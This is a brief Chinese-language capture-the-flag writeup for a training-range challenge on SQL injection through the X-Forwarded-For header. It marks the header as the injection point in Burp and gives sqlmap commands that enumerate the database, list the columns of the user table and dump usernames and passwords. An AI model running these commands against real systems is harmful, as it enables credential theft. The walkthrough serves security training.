墨者学院 – X-Forwarded-For注入漏洞实战Writeup

枫少@KillBoy

管理员

213
文章

0
粉丝

SQL注入评论45,0081字数 79阅读0分15秒阅读模式

1.首先打开burp抓包，添加x-forwarded-for:*，将raw的信息存为txt文件，如下图所示

2.爆出当前的数据库

sqlmap -r 1.txt --current-db --batch

3.爆表名

sqlmap -r 1.txt -D webcalendar -T user --columns --batch

4.爆表中的字段

sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch

5.得到帐号密码

6.登陆获得KEY

Xcheck之Java安全检查引擎

资源分享 7,081 04/01

资源分享 6,960 03/28

资源分享 5,955 03/04

渗透测试 7,883 08/03 1